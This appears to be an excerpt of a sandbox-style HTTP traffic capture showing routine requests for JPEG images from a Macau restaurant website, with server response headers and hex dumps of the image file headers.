                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedd!"1AaBq2b#3$4!1AQa2q"b?ue|DNtDDNtE"Lyp1h(a0s#y1D\t_EJHS91x21a1W9r-}(C*1"?:)NtDD^+sAg=RNz:^R$n>TVPIN?<$W#^[^qpYm=G}3-KbXi|]|H'=U"-5q: d#g6P`fec1N(oV| EoQ6u\<cp&xR+Wr*n+\1eK"Z"Or&$m %TWDU6Ze@Nl6Es.0SPT\5![dP1EjeQ}VouE8,~&>A)!H#<-'."[jB1Y .>u{3J5?c8b_!(QU+WIxy@>})z7~YFu7ibcU^UU8Scrv NrJy
                                                                                                                                                              Mar 13, 2023 05:26:11.847296000 CET1658OUTGET /images/logo_rightPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.052834034 CET1718INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 24133
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5cc7bf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:17 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 11 18 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 ca 00 00 01 01 00 03 00 00 00 01 00 81 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 33 30 20 31 33 3a 32 35 3a 31 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 02 62 a0 03 00 04 00 00 00 01 00 00 00 2b 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 0f 92 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f
                                                                                                                                                              Data Ascii: ExifMM*(12i ''Adobe Photoshop CS6 (Windows)2020:06:30 13:25:110221b+nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://
                                                                                                                                                              Mar 13, 2023 05:26:12.266434908 CET1816OUTGET /images/topbanner.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.471474886 CET1866INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 30262
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8228d3f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:17 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 10 a7 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 ca 00 00 01 01 00 03 00 00 00 01 00 81 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 33 30 20 31 33 3a 32 33 3a 34 34 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 03 ca a0 03 00 04 00 00 00 01 00 00 00 81 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 0f 21 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*(12i ''Adobe Photoshop CS6 (Windows)2020:06:30 13:23:440221nv(~!HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:12.763307095 CET1940OUTGET /images/menu04.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:12.968791008 CET1974INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1598
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ccff44f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 5a 03 01 11 00 02 11 01 03 11 01 ff c4 00 83 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 01 03 04 01 03 03 05 01 01 00 00 00 00 00 00 03 01 02 04 11 12 05 06 00 21 22 13 31 41 15 51 61 32 14 07 71 16 11 00 01 03 04 00 04 05 03 05 00 00 00 00 00 00 00 01 00 11 02 21 31 12 03 41 61 13 04 51 71 81 91 a1 b1 22 14 f0 e1 f1 32 82 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b7 f3 e5 95 e0 25 fc 22 5f c2 25 fc 22 5f c2 25 fc 22 5f c2 29 05 8d 2c 00 8b 28 f1 4c 18 d3 91 ee 85 21 e3 73 46 64 1b 95 8f 51 b9 52 8e 46 b9 15 16 9e 8b d3 86 56 31 20 02 45 d4 7b f8 55 4b f8 44 bf 84 4b f8 45 d2 e1 4e 95 ae 7f 35 8d 98 c0 c9 7c 0c ae 63 3a 78 79 2c b4 75 51 c9 18 40 06 3c 60 61 9b 47 31 ae 57 2b 96 d5 4a ff 00 89 4e 74 87 8c 1c 5c 95 dd 19 1d 7a 32 89 62 4b 13 c6 d6 56 39 38 80 6e 18 9d 5f 31 9c 79 19 9a 93 af 67 66 cd 98 1b 06 59 4b 8b 55 58 a5 35 5a eb ae a2 b5 ce a5 5c 89 eb cb 18 e6 01 37 63 f0 b5 3a c6 e8 c6 52 be 32 3e 6d 67 55 ed 7f 49 c3 65 07 a0 92 64 a9 82 66 d0 99 95 c9 b8 2a 35 51 a6 35 8a e1 a8 51 cc f7 a7 75 ca b5 f6 a7 29 1d 40 e3 cd fe 16 5a bb 68 cb 07 27 ee c9 fd 15 2e 29 71 8f d9 71 6b 88 8f 26 34 1f dd 8c 82 1c c3 30 e5 55 42 36 ae 57 0c 42 6a 57 e9 6f 4f aa fa f2 80 0c 83 2e 78 e3 98 c5 d9 c5 d7 60 dc f3 50 e4 4a dc 35 ac be c8 bb 24 bc 9e ce 8c c2 c1 6b 64 3d 70 e3 1c b7 a1 91 a5 94 36 35 8a ac 5f 1d a2 b9 9d 2b 5a 73 7d 85 dc 12 f5 f6 5d fd c6 c0 4c a1 29 64 4c a9 7f b6 bc fd a8 ab 79 1d 4f 50 89 93 dd 18 2f 97 7e 2f 44 bd 93 ae 38 16 44 d3 3e 4b 63 05 83 a4 7b 42 d6 b9 56 e7 b9 1f 54 a2 a3 52 b4 e5 0e b8 82 6f 45 8c f4 6b 12 9d da 3e 55 ab 78 53 e5 7a 3d 1b 5f 3c 78 bb 08 e4 64 07 ae 97 5e 93 9b 3e 35 c4 12 ce 42 45 92 91 1c 06 9b c4 d6 5a a4 72 2a 11 47 f8 d7 b7 8e 90 bf 06 74 1d b4 08 12 ae 38 92 dc 68 59 bf 76 56 02 e1 30 5b 2e 2f f9 c4 08 cb 3e 2e 25 30 7b 04 c0 34 84 13 a4 34 91 8c 73 58 e2 20 d1 8e 6f 91 aa 95 46 22 ab 7d 9a bc be 02 42 23 83 15 a9 d7 0d 91 d6 03 b3 48 fb 3a aa 6b fa 36 33 2f 8a d6 b2 52 26 4a 03 67 bb 32 6c ba 0e c7 2f eb e2 82 33 23 63 b5 5b 5b de 8e 54 ee 55 4f b7 d6 91 d4 08 07 cf e1 63 ab b6 8c e3 12 49 ab bf f9 f0 52 35 56 68 92 d9 b5 10 78 5c 9c 96 46 d7 24 49 7c 79 92 a2 bd c1 78 cc 36 aa 80 c9 11 7b dc d7 36 d7 d8 db 3b 92 8f ad 51 01 0a d0 d9 4e 91 a8 e5 43 fd 4d c8 f8 a7 f0 b4 c2 d7 f0 b3 75 83 65 b1 31 e5 e5 72 42 1c a3 e4 22 0f 21 1d 8f c6 84 44 54 1b 8b 15 d1 bc b2 19 e3 a3 9c 41 ab 5a 9e e8 da 72 b8 03 17 1f 5b 2c
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedZ!"1AQa2q!1AaQq"2?%"_%"_%"_),(L!sFdQRFV1 E{UKDKEN5|c:xy,uQ@<`aG1W+JNt\z2bKV98n_1ygfYKUX5Z\7c:R2>mgUIedf*5Q5Qu)@Zh'.)qqk&40UB6WBjWoO.x`PJ5$kd=p65_+Zs}]L)dLyOP/~/D8D>Kc{BVTRoEk>UxSz=_<xd^>5BEZr*Gt8hYvV0[./>.%0{44sX oF"}B#H:k63/R&Jg2l/3#c[[TUOcIR5Vhx\F$I|yx6{6;QNCMue1rB"!DTAZr[,
                                                                                                                                                              Mar 13, 2023 05:26:12.971946955 CET1975OUTGET /images/copyrightbg.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:13.177061081 CET2009INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 894
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8ebe1ff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 2b 03 ca 03 01 11 00 02 11 01 03 11 01 ff c4 00 58 00 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 09 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 02 01 04 03 00 00 00 00 00 00 00 00 00 00 00 01 02 03 11 31 41 51 21 04 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef 4e 6f 62 d7 99 ad 27 4a 47 5c 82 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 4c 79 6f 8e 75 ac f8 e6 bc 02 ff 00 d5 8b b9 db 5d b9 e8 19 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed+X1AQ!?Nob'JG\Lyou]
                                                                                                                                                              Mar 13, 2023 05:26:13.179039955 CET2010OUTGET /images/indexpic03.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:13.385044098 CET2051INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 97469
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "c219bdf7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 20 a5 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 32 3a 30 32 3a 33 39 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 1f 1f 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 